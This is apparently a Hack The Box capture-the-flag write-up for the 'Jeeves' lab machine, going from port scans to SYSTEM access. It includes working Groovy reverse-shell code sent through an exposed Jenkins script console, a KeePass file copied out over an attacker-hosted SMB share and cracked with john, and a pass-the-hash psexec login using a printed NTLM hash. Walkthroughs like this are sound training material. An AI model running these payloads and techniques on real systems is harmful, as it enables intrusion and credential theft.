Jeeves
Contents
Ports scan
u505@kali:~/HTB/Machines/Jeeves$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.63
Starting masscan 1.0.5 at 2020-05-26 19:10:07 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 135/tcp on 10.10.10.63 Discovered open port 50000/tcp on 10.10.10.63 Discovered open port 445/tcp on 10.10.10.63 Discovered open port 80/tcp on 10.10.10.63
u505@kali:~/HTB/Machines/Jeeves$ nmap -sC -sV 10.10.10.63 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 15:10 EDT Nmap scan report for jeeves.htb (10.10.10.63) Host is up (0.18s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Ask Jeeves 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 50000/tcp open http Jetty 9.4.z-SNAPSHOT |_http-server-header: Jetty(9.4.z-SNAPSHOT) |_http-title: Error 404 Not Found Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: |_clock-skew: mean: 5h05m06s, deviation: 0s, median: 5h05m06s |_smb-os-discovery: ERROR: Script execution failed (use -d to debug) | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-05-27T00:16:27 |_ start_date: 2020-05-27T00:14:33
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 99.79 seconds
Port 80
When we search for information, we only receive an image with an IIS Error, but it is not a real error (The HTTP response is 200 OK).
Dirsearch
The first search doesn't find anything.
u505@kali:~/HTB/Machines/Jeeves$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,html,asp,aspx" -r 1 -f -t 1000 -u http://jeeves.htb/
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, html, asp, aspx | HTTP method: get | Threads: 1000 | Wordlist size: 22974 | Recursion level: 1
Error Log: /opt/utils/dirsearch/logs/errors-20-05-26_15-24-28.log
Target: http://jeeves.htb/
[15:24:28] Starting: [15:24:45] 200 - 50B - /error.html [15:24:54] 200 - 503B - /index.html [15:24:54] 200 - 503B - /Index.html
Task Completed
And the second extended dictionary search doesn't find anything neither.
u505@kali:~/HTB/Machines/Jeeves$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -e "txt,html,asp,aspx" -r 1 -f -t 1000 -u http://jeeves.htb/
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, html, asp, aspx | HTTP method: get | Threads: 1000 | Wordlist size: 1038134 | Recursion level: 1
Error Log: /opt/utils/dirsearch/logs/errors-20-05-26_15-34-41.log
Target: http://jeeves.htb/
[15:34:41] Starting: [15:34:43] 200 - 503B - /index.html [15:35:14] 200 - 50B - /error.html
Task Completed
Windows enumeration
During the web enumeration, we try to find something in the windows side.
u505@kali:~/HTB/Machines/Jeeves$ smbclient -L \\10.10.10.63
Enter WORKGROUP\u505's password:
session setup failed: NT_STATUS_ACCESS_DENIED
u505@kali:~/HTB/Machines/Jeeves$ python3 /opt/utils/nullinux/nullinux.py 10.10.10.63
Starting nullinux v5.4.1 | 05-26-2020 15:33
[*] Enumerating Shares for: 10.10.10.63 Shares Comments -------------------------------------------
[-] No Shares Detected
[*] Enumerating Domain Information for: 10.10.10.63 [-] Could not attain Domain SID
[*] Enumerating querydispinfo for: 10.10.10.63
[*] Enumerating enumdomusers for: 10.10.10.63
[*] Enumerating LSA for: 10.10.10.63
[*] Performing RID Cycling for: 10.10.10.63 [-] RID Failed: Could not attain Domain SID
[*] Testing 10.10.10.63 for Known Users
[*] Enumerating Group Memberships for: 10.10.10.63
[*] 0 unique user(s) identified u505@kali:~/HTB/Machines/Jeeves$ nmap -p 445 --script=smb-enum-shares 10.10.10.63 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 15:34 EDT Nmap scan report for jeeves.htb (10.10.10.63) Host is up (0.043s latency).
PORT STATE SERVICE 445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 3.89 seconds
u505@kali:~/HTB/Machines/Jeeves$ enum4linux 10.10.10.63 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue May 26 15:34:41 2020
========================== | Target Information | ========================== Target ........... 10.10.10.63 RID Range ........ 500-550,1000-1050 Username ......... Password ......... Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=================================================== | Enumerating Workgroup/Domain on 10.10.10.63 | =================================================== [E] Can't find workgroup/domain
=========================================== | Nbtstat Information for 10.10.10.63 | =========================================== Looking up status of 10.10.10.63 No reply from 10.10.10.63
==================================== | Session Check on 10.10.10.63 | ==================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437. [E] Server doesn't allow session using username , password . Aborting remainder of tests.
But the access without password is unsuccessful.
Port 50000
Dirsearch
u505@kali:~/HTB/Machines/Jeeves$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,js,ear,war,jsp" -r 1 -f -t 1000 -u http://jeeves.htb:50000/
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, js, ear, war, jsp | HTTP method: get | Threads: 1000 | Wordlist size: 27569 | Recursion level: 1
Error Log: /opt/utils/dirsearch/logs/errors-20-05-26_15-26-04.log
Target: http://jeeves.htb:50000/
[15:26:04] Starting:
Task Completed
This search finds literally nothing.
u505@kali:~/HTB/Machines/Jeeves$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -e "txt,js,ear,war,jsp" -r 1 -f -t 1000 -u http://jeeves.htb:50000/
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, js, ear, war, jsp | HTTP method: get | Threads: 1000 | Wordlist size: 489773 | Recursion level: 1
Error Log: /opt/utils/dirsearch/logs/errors-20-05-26_15-41-12.log
Target: http://jeeves.htb:50000/
[15:41:13] Starting: [15:50:34] 200 - 11KB - /askjeeves/ [15:57:10] Starting: askjeeves/ [15:57:12] 200 - 45KB - /askjeeves/about/ [15:57:12] 200 - 11KB - /askjeeves/people/ [15:57:17] 500 - 15KB - /askjeeves/assets/ [15:57:35] 200 - 10KB - /askjeeves/log/ [15:57:41] 200 - 11KB - /askjeeves/computer/ [15:57:49] 200 - 14KB - /askjeeves/api/ [15:57:54] 403 - 595B - /askjeeves/me/ [15:57:59] 302 - 0B - /askjeeves/logout/ -> http://jeeves.htb:50000/askjeeves/ [15:58:24] 200 - 12KB - /askjeeves/script/ [15:58:28] 200 - 71B - /askjeeves/robots.txt CTRL+C detected: Pausing threads, please wait...
Canceled by the user
At least the extended search finds a folder.
Jenkins
Jenkins allows to execute groovy script, I found a groovy reverse shell.
u505@kali:~/HTB/Machines/Jeeves$ rlwrap nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
We write the groovy script in the script form.
String host="10.10.14.34";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream
po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
u505@kali:~/HTB/Machines/Jeeves$ rlwrap nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.63. Ncat: Connection from 10.10.10.63:49677. Microsoft Windows [Version 10.0.10586] (c) 2015 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\.jenkins>whoami whoami jeeves\kohsuke
User Flag
c:\Users\kohsuke\Desktop>type user.txt type user.txt <USER_FLAG>
System enumeration
Systeminfo
c:\Users\kohsuke\Desktop>systeminfo systeminfo
Host Name: JEEVES OS Name: Microsoft Windows 10 Pro OS Version: 10.0.10586 N/A Build 10586 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00331-20304-47406-AA297 Original Install Date: 10/25/2017, 4:45:33 PM System Boot Time: 5/26/2020, 8:14:12 PM System Manufacturer: VMware, Inc. System Model: VMware7,1 System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-05:00) Eastern Time (US & Canada) Total Physical Memory: 2,047 MB Available Physical Memory: 1,011 MB Virtual Memory: Max Size: 2,687 MB Virtual Memory: Available: 1,576 MB Virtual Memory: In Use: 1,111 MB Page File Location(s): C:\pagefile.sys Domain: WORKGROUP Logon Server: N/A Hotfix(s): 10 Hotfix(s) Installed. [01]: KB3150513 [02]: KB3161102 [03]: KB3172729 [04]: KB3173428 [05]: KB4021702 [06]: KB4022633 [07]: KB4033631 [08]: KB4035632 [09]: KB4051613 [10]: KB4041689 Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) 82574L Gigabit Network Connection Connection Name: Ethernet0 DHCP Enabled: No IP address(es) [01]: 10.10.10.63 Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
The system is Windows 10 with hotfixes, the likelihood of a vulnerability when the box was released was very small, so we try to find more information.
Document folder
c:\Users\kohsuke\Documents>dir dir Volume in drive C has no label. Volume Serial Number is BE50-B1C9
Directory of c:\Users\kohsuke\Documents
11/03/2017 11:18 PM <DIR> . 11/03/2017 11:18 PM <DIR> .. 09/18/2017 01:43 PM 2,846 CEH.kdbx 1 File(s) 2,846 bytes 2 Dir(s) 7,497,703,424 bytes free
There is a keepass file on the document folder. I first tried to use certutil to convert the file to base64 encoding and copy/paste it, but the utility is not available. So we setup samba in our box to copy the file.
u505@kali:~/HTB/Machines/Jeeves$ sudo mv /etc/samba/smb.conf /etc/samba/smb.conf.bck [sudo] password for u505:
u505@kali:~/HTB/Machines/Jeeves$ sudo vi /etc/samba/smb.conf u505@kali:~/HTB/Machines/Jeeves$ cat /etc/samba/smb.conf [u505] path = /home/u505/HTB/Machines/Jeeves/samba valid users = u505 read only = no
Samba startup.
u505@kali:~/HTB/Machines/Jeeves$ sudo systemctl start smbd
u505@kali:~/HTB/Machines/Jeeves$ sudo systemctl status smbd
● smbd.service - Samba SMB Daemon
Loaded: loaded (/lib/systemd/system/smbd.service; disabled; vendor preset:>
Active: active (running) since Tue 2020-05-26 17:59:18 EDT; 4s ago
Docs: man:smbd(8)
man:samba(7)
man:smb.conf(5)
Process: 10973 ExecStartPre=/usr/share/samba/update-apparmor-samba-profile >
Main PID: 10982 (smbd)
Status: "smbd: ready to serve connections..."
Tasks: 4 (limit: 18961)
Memory: 14.5M
CGroup: /system.slice/smbd.service
├─10982 /usr/sbin/smbd --foreground --no-process-group
├─10985 /usr/sbin/smbd --foreground --no-process-group
├─10986 /usr/sbin/smbd --foreground --no-process-group
└─10987 /usr/sbin/smbd --foreground --no-process-group
May 26 17:59:17 kali systemd[1]: Starting Samba SMB Daemon...
May 26 17:59:17 kali update-apparmor-samba-profile[10976]: grep: /etc/apparmor.>
May 26 17:59:17 kali update-apparmor-samba-profile[10979]: diff: /etc/apparmor.>
May 26 17:59:18 kali smbd[10982]: [2020/05/26 17:59:18.096126, 0] ../../lib/ut>
May 26 17:59:18 kali smbd[10982]: daemon_ready: daemon 'smbd' finished starti>
May 26 17:59:18 kali systemd[1]: Started Samba SMB Daemon.
Create our samba user.
u505@kali:~/HTB/Machines/Jeeves$ sudo smbpasswd -a u505 New SMB password: Retype new SMB password: Added user u505.
From the target we map the network share as disk drive U:
c:\Users\kohsuke\Documents>net use U: \\10.10.14.34\u505 /user:\u505 password net use U: \\10.10.14.34\u505 /user:\u505 password The command completed successfully.
Copy the file to our box
c:\Users\kohsuke\Documents>copy CEH.kdbx U:\
copy CEH.kdbx U:\
1 file(s) copied.
Brute force keepass file
u505@kali:~/HTB/Machines/Jeeves/samba$ file CEH.kdbx
CEH.kdbx: Keepass password database 2.x KDBX
Hash generation of the kdbx file.
u505@kali:~/HTB/Machines/Jeeves/samba$ keepass2john CEH.kdbx > ../keepass.hash
Crack with john.
u505@kali:~/HTB/Machines/Jeeves$ john -w=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt keepass.hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1 (CEH)
1g 0:00:00:13 DONE (2020-05-26 18:08) 0.07347g/s 4039p/s 4039c/s 4039C/s nichole2..monyong
Use the "--show" option to display all of the cracked passwords reliably
Session completed
u505@kali:~/HTB/Machines/Jeeves$ john keepass.hash --show CEH:moonshine1
1 password hash cracked, 0 left
There are several users and passwords (that I tried unsuccessfully).
The backup stuff seems to be a NTLM hash.
Privilege escalation
psexec from Impacket is able to pass directly the hash.
u505@kali:~/HTB/Machines/Jeeves$ /opt/utils/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 administrator@10.10.10.63 Impacket v0.9.22.dev1+20200520.120526.3f1e7ddd - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.63..... [*] Found writable share ADMIN$ [*] Uploading file TJzxQaLW.exe [*] Opening SVCManager on 10.10.10.63..... [*] Creating service yTGt on 10.10.10.63..... [*] Starting service yTGt..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.10586] (c) 2015 Microsoft Corporation. All rights reserved.
Root Flag
C:\Windows\system32>cd c:\users\administrator\Desktop
c:\Users\Administrator\Desktop>dir /a Volume in drive C has no label. Volume Serial Number is BE50-B1C9
Directory of c:\Users\Administrator\Desktop
11/08/2017 10:05 AM <DIR> . 11/08/2017 10:05 AM <DIR> .. 11/03/2017 10:03 PM 282 desktop.ini 12/24/2017 03:51 AM 36 hm.txt 11/08/2017 10:05 AM 797 Windows 10 Update Assistant.lnk 3 File(s) 1,115 bytes 2 Dir(s) 7,497,236,480 bytes free
c:\Users\Administrator\Desktop>type hm.txt The flag is elsewhere. Look deeper.
After a long search, at the end the root flag was just right under our noses. It was hidden in an alternate data stream.
c:\Users\Administrator\Desktop>dir /r Volume in drive C has no label. Volume Serial Number is BE50-B1C9
Directory of c:\Users\Administrator\Desktop
11/08/2017 10:05 AM <DIR> . 11/08/2017 10:05 AM <DIR> .. 12/24/2017 03:51 AM 36 hm.txt 34 hm.txt:root.txt:$DATA 11/08/2017 10:05 AM 797 Windows 10 Update Assistant.lnk 2 File(s) 833 bytes 2 Dir(s) 7,497,236,480 bytes free
With more we can read the ADS.
c:\Users\Administrator\Desktop>more <hm.txt:root.txt <ROOT_FLAG>
References
Daniel Simao 20:23, 26 May 2020 (EDT)
